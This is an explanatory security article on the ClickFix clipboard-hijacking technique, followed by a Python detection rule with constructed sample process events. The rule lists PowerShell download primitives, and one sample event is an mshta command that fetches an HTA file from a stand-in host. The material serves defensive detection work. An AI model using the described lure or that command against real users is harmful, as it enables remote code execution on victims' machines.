ClickFix: social engineering meets clipboard hijacking
What is ClickFix?
ClickFix is a social engineering technique that has gained traction among threat actors targeting both enterprises and individual users. The attack begins with a compromised or attacker-controlled website that presents a convincing browser notification — typically styled to look like a Chrome, Edge, or Firefox update prompt, a CAPTCHA verification dialog, or a document rendering error. The prompt instructs the user to "fix" the issue by following a short set of steps.
Those steps are the payload delivery mechanism. The page silently copies a malicious command to the user's clipboard — usually a PowerShell one-liner or an mshta invocation — and then instructs the victim to open the Windows Run dialog (Win+R), paste the contents, and press Enter. The user believes they are completing a routine browser fix or verification step. What they are actually doing is executing attacker-supplied code with their own user privileges.
How clipboard hijacking works in this context
The technique exploits the fact that most users do not inspect clipboard contents before pasting. The JavaScript on the attacker's page uses the Clipboard API (navigator.clipboard.writeText()) or a legacy document.execCommand('copy') call to overwrite the clipboard with a carefully crafted command. The command is typically obfuscated — base64-encoded, string-concatenated, or wrapped in nested invocations — to avoid casual inspection.
A representative payload might look like this when decoded: a PowerShell command that downloads a second-stage binary from an attacker-controlled domain, writes it to a temporary directory, and executes it. Some variants use mshta to fetch and run an HTA file, which in turn drops a loader. The common thread is that the initial clipboard payload is short enough to seem innocuous and powerful enough to bootstrap a full compromise.
The attack does not exploit a software vulnerability. It exploits a behavioral pattern: users trust instructions that appear to come from their browser, and they do not read what they paste.
Detection opportunities
Despite its simplicity, ClickFix leaves several artifacts that defenders can monitor.
The most reliable detection surface is process telemetry. When a user opens the Run dialog and pastes a command, the resulting process tree is distinctive: explorer.exe spawning powershell.exe or mshta.exe with a command line that contains encoded content, download cradles (Invoke-WebRequest, Invoke-Expression, Net.WebClient), or references to suspicious domains.
Endpoint detection rules can target this pattern specifically. A Sigma rule matching explorer.exe as a parent process spawning powershell.exe with a command-line length exceeding a reasonable threshold (say, 200 characters) and containing base64 patterns or known download primitives will catch the majority of ClickFix variants with a low false-positive rate. Additional signals include clipboard API calls from browser tabs that lack user-initiated copy events, which can be detected via browser telemetry or JavaScript auditing on managed endpoints.
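The rule sketched above, as an added Python example that is not from the original article: it applies the explorer.exe-parent, length-threshold and content checks to constructed process-creation events. The threshold value, the indicator lists, and the handling of mshta.exe launched with a remote URL are assumptions chosen for illustration.

```python
import base64
import re
from dataclasses import dataclass

# Rule parameters (assumptions in line with the text): a long explorer.exe -> powershell.exe
# command line carrying encoded content or a download primitive, or mshta.exe with a remote URL.
LENGTH_THRESHOLD = 200
CHILD_IMAGES = {"powershell.exe", "pwsh.exe", "mshta.exe"}
DOWNLOAD_PRIMITIVES = ("invoke-webrequest", "invoke-expression", "net.webclient")
BASE64_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{40,}={0,2}(?![A-Za-z0-9+/])")
URL_RE = re.compile(r"https?://", re.IGNORECASE)

@dataclass
class ProcessEvent:
    parent_image: str  # full path of the parent process
    image: str         # full path of the spawned process
    command_line: str

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def clickfix_indicators(ev: ProcessEvent) -> list[str]:
    """Indicators that make a process-creation event match the rule; empty list if it does not."""
    if _basename(ev.parent_image) != "explorer.exe" or _basename(ev.image) not in CHILD_IMAGES:
        return []
    low, found = ev.command_line.lower(), []
    if len(ev.command_line) > LENGTH_THRESHOLD:
        found.append("long_command_line")
    if BASE64_RE.search(ev.command_line):
        found.append("base64_blob")
    found += [p for p in DOWNLOAD_PRIMITIVES if p in low]
    if _basename(ev.image) == "mshta.exe" and URL_RE.search(ev.command_line):
        found.append("mshta_remote_url")
    # Length alone is not a hit: it must coincide with encoded content or a download primitive.
    content_hits = [f for f in found if f != "long_command_line"]
    if "mshta_remote_url" in found or ("long_command_line" in found and content_hits):
        return found
    return []

# Constructed sample telemetry (not real captures). The encoded blob is a
# harmless Write-Output in the UTF-16LE form that -EncodedCommand expects.
_BENIGN = "Write-Output 'constructed benign sample: this string only exists to exercise the detector'"
_ENCODED = base64.b64encode(_BENIGN.encode("utf-16le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", PS, f"powershell.exe -NoProfile -EncodedCommand {_ENCODED}"),
    ProcessEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe -NoProfile -Command Get-Process"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", PS, f"powershell.exe -NoProfile -EncodedCommand {_ENCODED}"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe", "mshta.exe https://example.invalid/verify.hta"),
]
```

Only the first and last sample events match: the short interactive command and the same encoded command launched from cmd.exe rather than explorer.exe are left alone, which is what keeps the rule's false-positive rate low.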
Generating detection rules for ClickFix patterns
The value of understanding ClickFix at a technical level is that it maps cleanly to detection logic. Each stage of the kill chain — the clipboard write, the Run dialog invocation, the process spawn, the download cradle — is an observable event that can be expressed as a rule. Security teams that decompose the technique into these atomic behaviors can build layered detections rather than relying on a single signature that attackers can trivially modify.
Automated rule generation platforms can accelerate this process. Given a structured description of the technique — process relationships, command-line patterns, network indicators — the platform can produce Sigma, KQL, or SPL rules tailored to the organization's SIEM. The key is that the input to the generator must be precise. Vague descriptions produce vague rules. Techniques like ClickFix, with their well-defined execution chain, are ideal candidates for this kind of automated detection engineering.